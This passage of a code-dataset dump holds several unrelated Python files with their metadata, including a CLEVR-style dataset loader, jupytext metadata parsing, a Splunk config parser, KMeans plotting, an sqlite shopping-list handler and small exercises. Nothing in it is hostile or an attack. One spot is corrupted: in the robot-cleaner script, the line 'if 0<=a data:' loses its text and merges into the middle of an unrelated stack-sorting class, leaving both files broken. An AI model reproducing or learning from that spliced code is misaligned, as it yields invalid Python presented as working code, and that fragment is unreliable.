\"\"\"\n Args:\n idx (int): Index\n\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n if idx >= len(self):\n idx = idx%len(self)\n\n img = self.imgs[idx]\n target = self.getclass(idx)\n latent_value = torch.from_numpy(self.getlatentvalue(idx))\n latent_class = torch.from_numpy(self.getlatentclass(idx))\n latent_one_hot = torch.from_numpy(self.getlatentonehot(idx))\n \n relational_questions = {f\"relational_questions_{k}\":torch.from_numpy(v[idx]).float() for k,v in self.relational_qs.items()}\n non_relational_questions = {f\"non_relational_questions_{k}\":torch.from_numpy(v[idx]).float() for k,v in self.non_relational_qs.items()}\n \n relational_answers = {f\"relational_answers_{k}\":torch.from_numpy(v[idx]).long() for k,v in self.relational_as.items()}\n non_relational_answers = {f\"non_relational_answers_{k}\":torch.from_numpy(v[idx]).long() for k,v in self.non_relational_as.items()}\n \n # Do we test the analogy on the color/object_id?\n if self.test_id_analogy:\n # Let us reserve the QAs with regard to color/object_id greater than the given threshold:\n for (strq,poqs), (stra,poas) in zip(relational_questions.items(), relational_answers.items()):\n if self.train:\n # Only take the first ones:\n relational_questions[strq] = poqs[:self.test_id_analogy_threshold,...]\n relational_answers[stra] = poas[:self.test_id_analogy_threshold,...]\n else:\n # Only take the last ones:\n relational_questions[strq] = poqs[self.test_id_analogy_threshold:,...]\n relational_answers[stra] = poas[self.test_id_analogy_threshold:,...]\n\n for (strq,poqs), (stra,poas) in zip(non_relational_questions.items(), non_relational_answers.items()):\n if self.train:\n # Only take the first ones:\n non_relational_questions[strq] = poqs[:self.test_id_analogy_threshold,...]\n non_relational_answers[stra] = poas[:self.test_id_analogy_threshold,...]\n else:\n # Only take the last ones:\n non_relational_questions[strq] = poqs[self.test_id_analogy_threshold:,...]\n non_relational_answers[stra] = poas[self.test_id_analogy_threshold:,...]\n\n #img = (img*255).astype('uint8').transpose((2,1,0))\n img = img.transpose((2,1,0))\n img = Image.fromarray(img, mode='RGB')\n\n if self.transform is not None:\n img = 
self.transform(img)\n \n sampled_d = {\n \"experiences\":img, \n \"exp_labels\":target, \n \"exp_latents\":latent_class, \n \"exp_latents_values\":latent_value,\n \"exp_latents_one_hot\":latent_one_hot\n }\n \n sampled_d.update(relational_questions)\n sampled_d.update(non_relational_questions)\n\n sampled_d.update(relational_answers)\n sampled_d.update(non_relational_answers)\n\n return sampled_d","sub_path":"ReferentialGym/datasets/sort_of_CLEVR_dataset.py","file_name":"sort_of_CLEVR_dataset.py","file_ext":"py","file_size_in_byte":21711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162311887","text":"\"\"\"\nConvert between text notebook metadata and jupyter cell metadata.\n\nSee also https://ipython.org/ipython-doc/3/notebook/nbformat.html#cell-metadata\n\nmetadata.hide_input and metadata.hide_output are documented here:\nhttp://jupyter-contrib-nbextensions.readthedocs.io/en/latest/nbextensions/runtools/readme.html\n\nTODO: Update this if a standard gets defined at\nhttps://github.com/jupyter/notebook/issues/3700\n\nNote: Nteract uses \"outputHidden\" and \"inputHidden\". We may want to switch\nto those.\n\"\"\"\n\nimport ast\nimport json\nimport re\n\nfrom .languages import _JUPYTER_LANGUAGES\n\ntry:\n unicode # Python 2\nexcept NameError:\n unicode = str # Python 3\n\n_BOOLEAN_OPTIONS_DICTIONARY = [('hide_input', 'echo', True),\n ('hide_output', 'include', True)]\n_IGNORE_METADATA = ['collapsed', 'autoscroll', 'scrolled',\n 'deletable', 'format', 'trusted', 'skipline',\n 'noskipline', 'lines_to_next_cell',\n 'lines_to_end_of_cell_marker']\n_PERCENT_CELL = re.compile(\n r'(# |#)%%([^\\{\\[]*)(|\\[raw\\]|\\[markdown\\])([^\\{\\[]*)(|\\{.*\\})\\s*$')\n\n\ndef _r_logical_values(pybool):\n return 'TRUE' if pybool else 'FALSE'\n\n\nclass RLogicalValueError(Exception):\n \"\"\"Incorrect value for R boolean\"\"\"\n pass\n\n\nclass RMarkdownOptionParsingError(Exception):\n \"\"\"Error when parsing Rmd cell options\"\"\"\n pass\n\n\ndef _py_logical_values(rbool):\n if rbool in ['TRUE', 'T']:\n return True\n if rbool in ['FALSE', 'F']:\n return False\n raise RLogicalValueError\n\n\ndef metadata_to_rmd_options(language, metadata):\n \"\"\"\n Convert language and metadata information to their rmd representation\n :param language:\n :param metadata:\n :return:\n \"\"\"\n options = (language or 'R').lower()\n metadata = filter_metadata(metadata)\n if 'name' in metadata:\n options += ' ' + metadata['name'] + ','\n del metadata['name']\n for jupyter_option, rmd_option, rev in _BOOLEAN_OPTIONS_DICTIONARY:\n if jupyter_option in metadata:\n options += ' {}={},'.format(\n rmd_option, _r_logical_values(metadata[jupyter_option] != rev))\n del metadata[jupyter_option]\n for opt_name in metadata:\n opt_value = metadata[opt_name]\n opt_name = opt_name.strip()\n if opt_name == 'active':\n options += ' {}=\"{}\",'.format(opt_name, str(opt_value))\n elif isinstance(opt_value, bool):\n options += ' {}={},'.format(\n opt_name, 'TRUE' if opt_value else 'FALSE')\n elif isinstance(opt_value, list):\n options += ' {}={},'.format(\n opt_name, 'c({})'.format(\n ', '.join(['\"{}\"'.format(str(v)) for v in opt_value])))\n else:\n options += ' {}={},'.format(opt_name, str(opt_value))\n if not language:\n options = options[2:]\n return options.strip(',').strip()\n\n\ndef update_metadata_from_rmd_options(name, value, metadata):\n \"\"\"\n Update metadata using the _BOOLEAN_OPTIONS_DICTIONARY mapping\n :param name: option name\n :param value: option value\n :param 
metadata:\n :return:\n \"\"\"\n for jupyter_option, rmd_option, rev in _BOOLEAN_OPTIONS_DICTIONARY:\n if name == rmd_option:\n try:\n metadata[jupyter_option] = _py_logical_values(value) != rev\n return True\n except RLogicalValueError:\n pass\n return False\n\n\nclass ParsingContext:\n \"\"\"\n Class for determining where to split rmd options\n \"\"\"\n parenthesis_count = 0\n curly_bracket_count = 0\n square_bracket_count = 0\n in_single_quote = False\n in_double_quote = False\n\n def __init__(self, line):\n self.line = line\n\n def in_global_expression(self):\n \"\"\"Currently inside an expression\"\"\"\n return (self.parenthesis_count == 0 and self.curly_bracket_count == 0\n and self.square_bracket_count == 0\n and not self.in_single_quote and not self.in_double_quote)\n\n def count_special_chars(self, char, prev_char):\n \"\"\"Update parenthesis counters\"\"\"\n if char == '(':\n self.parenthesis_count += 1\n elif char == ')':\n self.parenthesis_count -= 1\n if self.parenthesis_count < 0:\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" has too many '\n 'closing parentheses'.format(self.line))\n elif char == '{':\n self.curly_bracket_count += 1\n elif char == '}':\n self.curly_bracket_count -= 1\n if self.curly_bracket_count < 0:\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" has too many '\n 'closing curly brackets'.format(self.line))\n elif char == '[':\n self.square_bracket_count += 1\n elif char == ']':\n self.square_bracket_count -= 1\n if self.square_bracket_count < 0:\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" has too many '\n 'closing square brackets'.format(self.line))\n elif char == \"'\" and prev_char != '\\\\':\n self.in_single_quote = not self.in_single_quote\n elif char == '\"' and prev_char != '\\\\':\n self.in_double_quote = not self.in_double_quote\n\n\ndef parse_rmd_options(line):\n \"\"\"\n Given a R markdown option line, returns a list of pairs name,value\n :param line:\n :return:\n \"\"\"\n parsing_context = ParsingContext(line)\n\n result = []\n prev_char = ''\n\n name = ''\n value = ''\n\n for char in ',' + line + ',':\n if parsing_context.in_global_expression():\n if char == ',':\n if name != '' or value != '':\n if result and name == '':\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" has no name for '\n 'option value {}'.format(line, value))\n result.append((name.strip(), value.strip()))\n name = ''\n value = ''\n elif char == '=':\n if name == '':\n name = value\n value = ''\n else:\n value += char\n else:\n parsing_context.count_special_chars(char, prev_char)\n value += char\n else:\n parsing_context.count_special_chars(char, prev_char)\n value += char\n prev_char = char\n\n if not parsing_context.in_global_expression():\n raise RMarkdownOptionParsingError(\n 'Option line \"{}\" is not properly terminated'.format(line))\n\n return result\n\n\ndef rmd_options_to_metadata(options):\n \"\"\"\n Parse rmd options and return a metadata dictionary\n :param options:\n :return:\n \"\"\"\n options = re.split(r'\\s|,', options, 1)\n if len(options) == 1:\n language = options[0]\n chunk_options = []\n else:\n language, others = options\n language = language.rstrip(' ,')\n others = others.lstrip(' ,')\n chunk_options = parse_rmd_options(others)\n\n language = 'R' if language == 'r' else language\n metadata = {}\n for i, opt in enumerate(chunk_options):\n name, value = opt\n if i == 0 and name == '':\n metadata['name'] = value\n continue\n else:\n if update_metadata_from_rmd_options(name, value, metadata):\n continue\n if 
name == 'active':\n metadata[name] = value.replace('\"', '').replace(\"'\", '')\n continue\n try:\n metadata[name] = _py_logical_values(value)\n continue\n except RLogicalValueError:\n metadata[name] = value\n\n for name in metadata:\n try_eval_metadata(metadata, name)\n\n if 'active' in metadata and 'eval' in metadata:\n del metadata['eval']\n\n return language, metadata\n\n\ndef md_options_to_metadata(options):\n \"\"\"Parse markdown options and return language and metadata (cell name)\"\"\"\n language = None\n name = None\n\n options = [opt for opt in options.split(' ') if opt != '']\n if len(options) >= 2:\n language, name = options[:2]\n elif options:\n language = options[0]\n\n if language:\n for lang in _JUPYTER_LANGUAGES + ['julia', 'scheme', 'c++']:\n if language.lower() == lang.lower():\n if name:\n return lang, {'name': name}\n return lang, {}\n\n return None, {'name': language}\n\n return None, {}\n\n\ndef try_eval_metadata(metadata, name):\n \"\"\"Evaluate given metadata to a python object, if possible\"\"\"\n value = metadata[name]\n if not isinstance(value, (str, unicode)):\n return\n if value.startswith('\"') or value.startswith(\"'\"):\n return\n if value.startswith('c(') and value.endswith(')'):\n value = '[' + value[2:-1] + ']'\n elif value.startswith('list(') and value.endswith(')'):\n value = '[' + value[5:-1] + ']'\n try:\n metadata[name] = ast.literal_eval(value)\n except (SyntaxError, ValueError):\n return\n\n\ndef json_options_to_metadata(options, add_brackets=True):\n \"\"\"Read metadata from its json representation\"\"\"\n try:\n options = json.loads('{' + options + '}' if add_brackets else options)\n return options\n except ValueError:\n return {}\n\n\ndef filter_metadata(metadata):\n \"\"\"Filter technical metadata\"\"\"\n return {k: metadata[k] for k in metadata if k not in _IGNORE_METADATA}\n\n\ndef metadata_to_json_options(metadata):\n \"\"\"Represent metadata as json text\"\"\"\n return json.dumps(metadata)\n\n\ndef is_active(ext, metadata):\n \"\"\"Is the cell active for the given file extension?\"\"\"\n if 'active' not in metadata:\n return True\n return ext.replace('.', '') in re.split('\\\\.|,', metadata['active'])\n\n\ndef double_percent_options_to_metadata(options):\n \"\"\"Parse double percent options\"\"\"\n matches = _PERCENT_CELL.findall('# %%' + options)[0]\n # Fifth match are JSON metadata\n if matches[4]:\n metadata = json_options_to_metadata(matches[4], add_brackets=False)\n else:\n metadata = {}\n\n # Third match is cell type\n cell_type = matches[2]\n if cell_type:\n metadata['cell_type'] = cell_type[1:-1]\n\n # Second and fourth match are description\n title = [matches[i].strip() for i in [1, 3]]\n title = [part for part in title if part]\n if title:\n title = ' '.join(title)\n cell_depth = 0\n while title.startswith('%'):\n cell_depth += 1\n title = title[1:]\n\n if cell_depth:\n metadata['cell_depth'] = cell_depth\n metadata['title'] = title.strip()\n\n return metadata\n\n\ndef metadata_to_double_percent_options(metadata):\n \"\"\"Metadata to double percent lines\"\"\"\n options = []\n if 'cell_depth' in metadata:\n options.append('%' * metadata.pop('cell_depth'))\n if 'title' in metadata:\n options.append(metadata.pop('title'))\n if 'cell_type' in metadata:\n options.append('[{}]'.format(metadata.pop('cell_type')))\n if metadata:\n options.append(metadata_to_json_options(metadata))\n return ' 
'.join(options)\n","sub_path":"jupytext/cell_metadata.py","file_name":"cell_metadata.py","file_ext":"py","file_size_in_byte":11354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401788489","text":"import xml.dom.minidom as xdm\nimport logging\nimport logging.handlers\nfrom splunk.appserver.mrsparkle.lib.util import make_splunkhome_path\n\n\ndef setup_logging(log_name, level_name=\"INFO\"):\n level_name = level_name.upper() if level_name else \"INFO\"\n loglevel_map = {\n \"DEBUG\": logging.DEBUG,\n \"INFO\": logging.INFO,\n \"WARN\": logging.WARN,\n \"ERROR\": logging.ERROR,\n }\n\n if level_name in loglevel_map:\n loglevel = loglevel_map[level_name]\n else:\n loglevel = logging.INFO\n\n logfile = make_splunkhome_path([\"var\", \"log\", \"splunk\",\n \"%s.log\" % log_name])\n logger = logging.getLogger(log_name)\n logger.propagate = False\n logger.setLevel(loglevel)\n\n handler_exists = any([True for h in logger.handlers\n if h.baseFilename == logfile])\n if not handler_exists:\n file_handler = logging.handlers.RotatingFileHandler(logfile, mode=\"a\",\n maxBytes=104857600,\n backupCount=5)\n fmt_str = \"%(asctime)s %(levelname)s %(thread)d - %(message)s\"\n formatter = logging.Formatter(fmt_str)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n return logger\n\n\ndef parse_configs(config_str, logger=logging):\n configs = []\n doc = xdm.parseString(config_str)\n root = doc.documentElement\n conf = root.getElementsByTagName(\"configuration\")[0]\n if not conf:\n logger.error(\"Invalid config, missing configuration section\")\n raise Exception(\"Invalid config, missing configuration section\")\n\n stanzas = conf.getElementsByTagName(\"stanza\")\n if not stanzas:\n logger.error(\"Invalid config, missing stanza\")\n raise Exception(\"Invalid config, missing stanza\")\n\n for stanza in stanzas:\n config = {}\n stanza_name = stanza.getAttribute(\"name\")\n if not stanza_name:\n logger.error(\"Invalid config, missing name\")\n raise Exception(\"Invalid config, missing name\")\n\n config[\"name\"] = stanza_name\n params = stanza.getElementsByTagName(\"param\")\n for param in params:\n name = param.getAttribute(\"name\")\n if (name and param.firstChild and\n param.firstChild.nodeType == param.firstChild.TEXT_NODE):\n config[name] = param.firstChild.data\n config[\"duration\"] = int(config[\"duration\"])\n config[\"priority\"] = int(config[\"priority\"])\n configs.append(config)\n return configs\n\n\ndef encrypt_username_password(app, configs):\n pass\n","sub_path":"SplunkApps/Splunk_TA_EMC/bin/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13980780","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import cm as cm\n\nfrom KMeans.Common.CalculateMidPointWithCentroidsAnswer import CalculateMidPointWithCentroidsAnswer\nfrom KMeans.Common.KMeansEnsembleResult import KMeansEnsembleResult\nfrom KMeans.TwoDimensional.TwoDimensionalData import TwoDimensionalData\n\n\nclass PlotTwoDimensionalData:\n def __init__(\n self,\n random_data: TwoDimensionalData,\n ensemble_results: KMeansEnsembleResult,\n mid_points01: CalculateMidPointWithCentroidsAnswer) -> None:\n super().__init__()\n self.mid_points01: CalculateMidPointWithCentroidsAnswer = mid_points01\n self.random_data: TwoDimensionalData = random_data\n self.ensemble_results: KMeansEnsembleResult = 
ensemble_results\n\n\n def image01(self):\n plt.figure()\n colors = iter(cm.rainbow(np.linspace(0, 1, self.random_data.ensemble_count)))\n\n for iteration in self.ensemble_results:\n data_point = iteration.dataset_indexes\n color = next(colors)\n plt.scatter(\n x=self.random_data.input_data[data_point, 0],\n y=self.random_data.input_data[data_point, 1],\n color=color,\n marker='.')\n\n plt.show()\n\n def image02(self):\n plt.figure()\n self.paint_centroids()\n plt.show()\n\n def paint_centroids(self):\n colors = iter(cm.rainbow(np.linspace(0, 1, self.random_data.ensemble_count)))\n for data_point in self.ensemble_results:\n color = next(colors)\n plt.scatter(\n x=data_point.centroids[:, 0],\n y=data_point.centroids[:, 1],\n color=color,\n marker='o')\n\n def paint_mid_points01(self):\n for mid_point in self.mid_points01:\n for p in mid_point:\n data = np.vstack((mid_point.mid_point, p))\n plt.plot(data[:, 0], data[:,1], color='black')\n plt.scatter(\n x=mid_point.mid_point[0],\n y=mid_point.mid_point[1],\n color='black',\n marker='X')\n\n\n\n def image03(self):\n plt.figure()\n self.paint_centroids()\n self.paint_mid_points01()\n\n plt.show()\n\n def plot(self):\n self.image01()\n self.image02()\n self.image03()\n","sub_path":"KMeans/Python/KMeans/TwoDimensional/PlotTwoDimensionalData.py","file_name":"PlotTwoDimensionalData.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"358746708","text":"from mst import PyMaxSpanTree\nimport numpy as np\n\n\nclass DependencyTree(object):\n def __init__(self):\n self.edges = []\n self.node_depths = {}\n self.deps = {}\n self.height = None\n\n def __repr__(self):\n template = '\\nHeight: {0.height} ' \\\n '\\nDependencies: {0.deps}' \\\n '\\nEdges: {0.edges}' \\\n '\\nNode Depths: {0.node_depths}'\n return template.format(self)\n\n def parse_tree(self, mst_tree):\n for pidx, cidx, weight in mst_tree:\n pidx = int(pidx)\n cidx = int(cidx)\n self.edges.append(Edge(pidx, cidx, weight))\n if pidx in self.deps:\n self.deps[pidx].append(cidx)\n else:\n self.deps[pidx] = [cidx]\n\n self._set_height()\n self._set_node_depths()\n\n def _set_height(self):\n self.height = len(self.deps.keys())\n\n def _set_node_depths(self):\n for parent_num, parent in enumerate(self.deps.keys()):\n self.node_depths[parent_num] = len(self.deps[parent])\n\n\nclass Edge(object):\n def __init__(self, srcidx, tgtidx, weight):\n self.src_idx = srcidx\n self.tgt_idx = tgtidx\n self.weight = weight\n\n def __repr__(self):\n return str(self.src_idx)+\"-\"+str(self.tgt_idx)+\",\"+str(self.weight)\n\n\ndef calculate_tree(docs):\n mst_obj = PyMaxSpanTree()\n for doc in docs:\n dep_tree = DependencyTree()\n str_scores = np.delete(doc.str_scores, 0, 0) # delete first row for ROOT being the child\n mst_tree = mst_obj.get_tree(str_scores)\n dep_tree.parse_tree(mst_tree)\n doc.tree = dep_tree\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"postprocess/dependency_tree.py","file_name":"dependency_tree.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589310016","text":"import sys\n\nsys.stdin = open(\"input.txt\",\"r\")\n\nn,m = tuple(map(int,sys.stdin.readline().rstrip().split()))\nr,c,d = tuple(map(int,sys.stdin.readline().rstrip().split()))\ncurrent = (r,c)\n\nboard = [[int(i) for i in sys.stdin.readline().rstrip().split()] for j in range(n)]\ncheck = [[0 for i in range(m)] for j in range(n)]\n\ndirection = 
{0:[(0,-1),(1,0),(0,1),(-1,0)],\n 1:[(-1,0),(0,-1),(1,0),(0,1)],\n 2:[(0,1),(-1,0),(0,-1),(1,0)],\n 3:[(1,0),(0,1),(-1,0),(0,-1)]}\n\ndirection_change = {0:3,1:0,2:1,3:2}\n\nclean = 0\nend = 0\n\ndef inRange(a,b):\n if 0<=a data:\n self.buffer.push(self.main.pop())\n self.content()\n self.main.push(data)\n self.content()\n while self.buffer.top is not None:\n self.main.push(self.buffer.pop())\n self.content()\n\n def pop(self):\n self.main.pop()\n\n def peek(self):\n return self.main.peek()\n\n def is_empty(self):\n return self.main.size == 0\n\n def content(self):\n print('Main:', end=' '), self.main.output()\n print('Buffer:', end=' '), self.buffer.output()\n print()\n\n\ndef sorting(unsorted):\n result = Stack()\n while not unsorted.isEmpty():\n temporary = unsorted.pop()\n while not result.isEmpty() and result.peek() > temporary:\n unsorted.push(result.pop())\n result.push(temporary)\n return result\n\n\nif __name__ == '__main__':\n import random\n test_array = [round(random.random(), 2) for i in range(8)]\n\n unsorted = Stack()\n for i in test_array:\n unsorted.push(i)\n unsorted.output()\n unsorted = sorting(unsorted)\n unsorted.output()\n\n # ordered = AscendingOrder()\n # print('Test ascending order while push the data\\n')\n # for i in test_array:\n # ordered.push(i)\n # print(ordered.peek(), '\\n')\n #\n # print('Test popping')\n # ordered.pop()\n # print(ordered.peek())\n # ordered.pop()\n # print(ordered.peek())\n\n","sub_path":"experiments/34_question_and_solutions/03_stacks_and_queues/ascending_order.py","file_name":"ascending_order.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59898022","text":"#main module\nimport exceptionhandling as t\nimport conversion as c\nimport calculation as cal\n\ndef main_method():\n m=True\n while m==True:\n print((\"\\n\"))\n actualbinarynum=\"\"\n num1,num2=t.num_valid()\n binary_1=c.conv(num1)\n binary_2=c.conv(num2)\n l1=c.dectobin(num1)\n l3=c.dectobin(num2)\n a=l1\n b=l3\n actual_result=cal.calculate_result(b,a)\n Result=actual_result\n Result.reverse()\n actual=actual_result\n l=c.bintodec(actual_result)\n for i in range (len(actual)-1,-1,-1):\n actualbinarynum = actualbinarynum+str(actual[i])\n a.reverse()\n b.reverse()\n print((\"\\n\"))\n print(\"The first Number you entered is:\",num1)\n print(\"The conversion of first number in list is:\",a)\n print(\"The binary conversion of the first number is:\",binary_1)\n print((\"\\n\"))\n print(\"The second number you entered is:\",num2)\n print(\"The conversion of second number in list is:\",b)\n print(\"The binary conversion of the second number is:\",binary_2)\n print((\"\\n\"))\n print(\"The sum of numbers in binary in list is:\",Result)\n print(\"The sum of the number in binary is:\",actualbinarynum)\n print(\"The final result in Decimal is:\",l)\n print((\"\\n\"))\n cont=input(\"Do you wish to continue ?(Y/N)\")\n if cont.upper()==\"Y\":\n m= True\n elif cont.upper()==\"N\":\n \n m= False\n \nif __name__=='__main__':\n main_method()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62662419","text":"import logging\nimport os\nfrom common import constant\nfrom common.ConfTools import DoConf\n\n\nclass LogTools:\n\n def __init__(self, login_name):\n conf = DoConf(constant.globe_conf_dir)\n # 定义一个日志收集器\n self.mylog = logging.getLogger(login_name)\n 
# 设置收集级别\n        self.mylog.setLevel(conf.get_value('log_level', 'info'))\n\n        # 设置日志输出格式\n        famatter = logging.Formatter(conf.get_value('log_format', 'format'))\n        # 设置日志控制台输出\n        hdr = logging.StreamHandler()\n        hdr.setLevel(conf.get_value('log_level', 'info'))\n        hdr.setFormatter(famatter)\n\n        # 设置日志文件输出\n        fdr = logging.FileHandler(os.path.join(constant.log_dir, 'log_info.log'), encoding='utf-8')\n        fdr.setLevel(conf.get_value('log_level', 'info'))\n        fdr.setFormatter(famatter)\n\n        # 日志与收集器对接\n        self.mylog.addHandler(hdr)\n        self.mylog.addHandler(fdr)\n\nif __name__ == '__main__':\n    log = LogTools('test')\n    log.mylog.info('测试数据123456')\n    print(\"测试数据\")\n","sub_path":"qianchendai/common/LogTools.py","file_name":"LogTools.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"168185824","text":"#!/usr/bin/env python3\r\n\r\nimport abc\r\nfrom typing import Dict, Any, Text, NoReturn, Tuple, Optional, List\r\n\r\nimport sqlite3\r\n\r\n\r\nclass Database:\r\n    \"\"\" Sqlite3 database python handler \"\"\"\r\n\r\n    def __init__(self, db_name: Text = 'chat_bot.db'):\r\n        self._db_name = db_name\r\n        self._conn = sqlite3.connect(db_name, 1000, check_same_thread=False)\r\n        self._cur = None\r\n        self._nest_index = 0\r\n        with self as cur:\r\n            cur.execute('PRAGMA foreign_keys = ON') # enable foreign keys\r\n\r\n    @property\r\n    def conn(self) -> sqlite3.Connection:\r\n        return self._conn\r\n\r\n    def insert(self, table, data: Dict[Text, Any]) -> NoReturn:\r\n        values = tuple(data.values())\r\n        formatted_keys = ','.join(data.keys())\r\n        with self as cur:\r\n            cur.execute(f'INSERT INTO {table} ({formatted_keys}) VALUES ({\"?\" + \",?\" * (len(values) - 1)})', values)\r\n\r\n    def delete(self, table: Text, data: Dict[Text, Any]) -> NoReturn:\r\n        cond = ' AND '.join((f'{key}=?' for key in data.keys()))\r\n        with self as cur:\r\n            cur.execute(f'DELETE FROM {table} WHERE {cond}', tuple(data.values()))\r\n\r\n    def update(self, table: Text, set_mapper: Dict[Text, Any], cond_mapper: Dict[Text, Any]) -> NoReturn:\r\n        cond = ' AND '.join((f'{key}=?' for key in cond_mapper.keys()))\r\n        set_keys = ','.join((f'{key}=?' for key in set_mapper.keys()))\r\n        args = tuple(set_mapper.values()) + tuple(cond_mapper.values())\r\n        with self as cur:\r\n            cur.execute(f'UPDATE {table} SET {set_keys} WHERE {cond}', args)\r\n\r\n    def search_unique(self, table: str, data: Dict[Text, Any]) -> Any:\r\n        cond = ' AND '.join((f'{key}=?'
for key in data.keys()))\r\n with self as cur:\r\n return cur.execute(f'SELECT * FROM {table} WHERE {cond}', tuple(data.values())).fetchone()\r\n\r\n def all(self, table: Text) -> Any:\r\n with self as cur:\r\n return cur.execute(f'SELECT * FROM {table}').fetchall()\r\n\r\n def __enter__(self) -> sqlite3.Cursor:\r\n if not self._nest_index:\r\n self._cur = self._conn.cursor()\r\n self._nest_index += 1\r\n return self._cur\r\n\r\n def __exit__(self, *args, **kwargs):\r\n self._nest_index -= 1\r\n if not self._nest_index:\r\n self._conn.commit()\r\n self._cur.close()\r\n self._cur = None\r\n\r\n def __del__(self):\r\n self._conn.close()\r\n\r\n\r\nclass TableBase(abc.ABC):\r\n def __init__(self, database: Database):\r\n self.db = database\r\n\r\n\r\nclass ShoppingListTable(TableBase):\r\n TABLE_NAME = 'ShoppingList'\r\n DEFAULT_LIST = 'default'\r\n\r\n def __init__(self, database: Database):\r\n super().__init__(database)\r\n cmd = f'CREATE TABLE IF NOT EXISTS {self.TABLE_NAME}'\r\n columns = '(name VARCHAR(64) PRIMARY KEY)'\r\n with self.db as cur:\r\n cur.execute(cmd + columns)\r\n try:\r\n self.insert(self.DEFAULT_LIST)\r\n except sqlite3.IntegrityError:\r\n pass\r\n\r\n def get(self, name: Text) -> Dict[Text, Any]:\r\n return self._convert_query(self.db.search_unique(self.TABLE_NAME, dict(name=name)))\r\n\r\n def insert(self, name: Text) -> Any:\r\n with self.db:\r\n self.db.insert(self.TABLE_NAME, dict(name=name))\r\n return self.get(name)\r\n\r\n def delete(self, name: Text) -> NoReturn:\r\n self.db.delete(self.TABLE_NAME, dict(name=name))\r\n\r\n def all(self) -> List[Dict[Text, Any]]:\r\n data = self.db.all(self.TABLE_NAME)\r\n return list(map(self._convert_query, data))\r\n\r\n @staticmethod\r\n def _convert_query(data: Tuple[Text]):\r\n return dict(name=data[0])\r\n\r\n\r\nclass ItemTable(TableBase):\r\n TABLE_NAME = 'Item'\r\n\r\n def __init__(self, database: Database):\r\n super().__init__(database)\r\n cmd = f'CREATE TABLE IF NOT EXISTS {self.TABLE_NAME}'\r\n columns = \"\"\"(\r\n id VARCHAR(64),\r\n list_name VARCHAR(64),\r\n name VARCHAR(64) NOT NULL,\r\n quantity INT NOT NULL,\r\n \r\n PRIMARY KEY (id, list_name),\r\n FOREIGN KEY (list_name) REFERENCES {} (name) ON DELETE CASCADE ON UPDATE NO ACTION\r\n )\"\"\".format(ShoppingListTable.TABLE_NAME)\r\n with self.db as cur:\r\n cur.execute(cmd + columns)\r\n\r\n def get(self, list_name: Text, iid: Text) -> Optional[Dict[Text, Any]]:\r\n data = self.db.search_unique(self.TABLE_NAME, dict(id=iid, list_name=list_name))\r\n if data is not None:\r\n data = self._convert_query(data)\r\n return data\r\n\r\n def insert(self, list_name: Text, iid: Text, name: Text, quantity: int) -> Dict[Text, Any]:\r\n with self.db:\r\n self.db.insert(self.TABLE_NAME, dict(id=iid, list_name=list_name, name=name, quantity=quantity))\r\n return self.get(list_name, iid)\r\n\r\n def delete(self, list_name: Text, iid: Text) -> NoReturn:\r\n self.db.delete(self.TABLE_NAME, dict(id=iid, list_name=list_name))\r\n\r\n def update(self, list_name: Text, iid: Text, quantity: int) -> NoReturn:\r\n self.db.update(self.TABLE_NAME, dict(quantity=quantity), dict(list_name=list_name, id=iid))\r\n\r\n def add_quantity(self, list_name: Text, iid: Text, name: Text, amount: int) -> Dict[Text, Any]:\r\n with self.db:\r\n item = self.get(list_name, iid)\r\n if item is None:\r\n return self.insert(list_name, iid, name, amount)\r\n self.update(list_name, iid, item['quantity'] + amount)\r\n return self.get(list_name, iid)\r\n\r\n def remove_quantity(self, list_name: Text, iid: 
Text, amount: int) -> Optional[Dict[Text, Any]]:\r\n with self.db:\r\n item = self.get(list_name, iid)\r\n if item is None:\r\n return None\r\n\r\n new_quantity = item['quantity'] - amount\r\n if new_quantity <= 0:\r\n self.delete(list_name, iid)\r\n return None\r\n self.update(list_name, iid, new_quantity)\r\n return self.get(list_name, iid)\r\n\r\n def set_quantity(self, list_name: Text, iid: Text, name: Text, amount: int) -> Any:\r\n with self.db:\r\n item = self.get(list_name, iid)\r\n if item is None:\r\n return self.insert(list_name, iid, name, amount)\r\n self.update(list_name, iid, amount)\r\n return self.get(list_name, iid)\r\n\r\n def all(self) -> List[Dict[Text, Any]]:\r\n data = self.db.all(self.TABLE_NAME)\r\n return ShoppingList(list(map(self._convert_query, data)))\r\n\r\n @staticmethod\r\n def _convert_query(data: Tuple[Text, Text, Text, int]):\r\n return dict(id=data[0], list_name=data[1], name=data[2], quantity=data[3])\r\n\r\nclass ShoppingList:\r\n def __init__(self, data):\r\n self.data = data\r\n \r\n def __str__(self):\r\n if len(self.data) == 0:\r\n return \"Your shopping list is empty.\"\r\n else:\r\n title = '# -------- SHOPPING LIST -------- #\\n'\r\n rows = (f'{item[\"name\"]:>18s} - {item[\"quantity\"]}' for item in self.data)\r\n return title + '\\n'.join(rows)\r\n","sub_path":"scripts/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":7165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"170122080","text":"import 